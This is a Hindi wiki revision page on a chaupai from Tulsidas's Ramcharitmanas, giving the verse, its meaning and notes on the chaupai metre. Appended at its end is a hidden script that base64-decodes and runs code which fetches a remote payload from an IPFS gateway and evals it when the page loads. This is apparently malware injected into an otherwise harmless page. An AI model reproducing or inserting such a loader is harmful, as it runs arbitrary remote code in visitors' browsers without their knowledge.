Difference between revisions of "उघरहिं बिमल बिलोचन ही के"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{सूचना बक्सा पुस्तक |चित्र=Sri-ramcharitmanas.jpg |चित्र का नाम=रा...' के साथ नया पृष्ठ बनाया)
 
m (Text replacement - " दुख " to " दु:ख ")
 
(2 intermediate revisions by 2 users not shown)
Line 32: Line 32:
 
<poem>
 
<poem>
 
;चौपाई
 
;चौपाई
उघरहिं बिमल बिलोचन ही के। मिटहिं दोष दुख भव रजनी के॥
+
उघरहिं बिमल बिलोचन ही के। मिटहिं दोष दु:ख भव रजनी के॥
 
सूझहिं राम चरित मनि मानिक। गुपुत प्रगट जहँ जो जेहि खानिक॥4॥
 
सूझहिं राम चरित मनि मानिक। गुपुत प्रगट जहँ जो जेहि खानिक॥4॥
 
</poem>
 
</poem>
Line 40: Line 40:
  
  
{{लेख क्रम4| पिछला=श्री गुर पद नख मनि गन जोती |मुख्य शीर्षक=रामचरितमानस |अगला=उघरहिं बिमल बिलोचन ही के}}
+
{{लेख क्रम4| पिछला=श्री गुर पद नख मनि गन जोती |मुख्य शीर्षक=रामचरितमानस |अगला=जथा सुअंजन अंजि}}
  
'''चौपाई'''- मात्रिक सम [[छन्द]] का भेद है। [[प्राकृत]] तथा [[अपभ्रंश]] के 16 मात्रा के वर्णनात्मक छन्दों के आधार पर विकसित [[हिन्दी]] का सर्वप्रिय और अपना छन्द है। इसका विकास पादाकुलक के चौकलों के नियम के शिथिल होने से सम्भव जान पड़ता है। भानु ने चौपाई के 16 मात्रा के चरणों में न तो चौकलों का कोई क्रम माना है और न ही लघु-गुरु का। उन्होंने सम के पीछे सम और विषम के पीछे विषम कल के प्रयोग को अच्छा माना है तथा अन्त में जगण (।ऽ।) और तगण (ऽऽ।) को वर्जित माना है।
+
'''चौपाई'''- मात्रिक सम [[छन्द]] का भेद है। [[प्राकृत]] तथा [[अपभ्रंश]] के 16 मात्रा के वर्णनात्मक छन्दों के आधार पर विकसित [[हिन्दी]] का सर्वप्रिय और अपना छन्द है। [[तुलसीदास|गोस्वामी तुलसीदास]] ने [[रामचरितमानस]] में चौपाई छन्द का बहुत अच्छा निर्वाह किया है। चौपाई में चार चरण होते हैं, प्रत्येक चरण में 16-16 मात्राएँ होती हैं तथा अन्त में गुरु होता है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 14:01, 2 June 2017

ugharahian bimal bilochan hi ke
kavi gosvami tulasidas
mool shirshak ramacharitamanas
mukhy patr ram, sita, lakshman, hanuman, ravan adi
prakashak gita pres gorakhapur
bhasha avadhi bhasha
shaili soratha, chaupaee aur doha
sanbandhit lekh dohavali, kavitavali, gitavali, vinay patrika, hanuman chalisa
kand balakand
chaupaee

ugharahian bimal bilochan hi ke. mitahian dosh du:kh bhav rajani ke॥
soojhahian ram charit mani manik. guput pragat jahan jo jehi khanik॥4॥

bhavarth-

usake hriday mean ate hi hriday ke nirmal netr khul jate haian aur sansar roopi ratri ke dosh-duahkh mit jate haian evan shri ramacharitr roopi mani aur maniky, gupt aur prakat jahaan jo jis khan mean hai, sab dikhaee p dane lagate haian-॥4॥



left|30px|link=shri gur pad nakh mani gan joti|pichhe jaean ugharahian bimal bilochan hi ke right|30px|link=jatha suaanjan aanji|age jaean

chaupaee- matrik sam chhand ka bhed hai. prakrit tatha apabhransh ke 16 matra ke varnanatmak chhandoan ke adhar par vikasit hindi ka sarvapriy aur apana chhand hai. gosvami tulasidas ne ramacharitamanas mean chaupaee chhand ka bahut achchha nirvah kiya hai. chaupaee mean char charan hote haian, pratyek charan mean 16-16 matraean hoti haian tatha ant mean guru hota hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>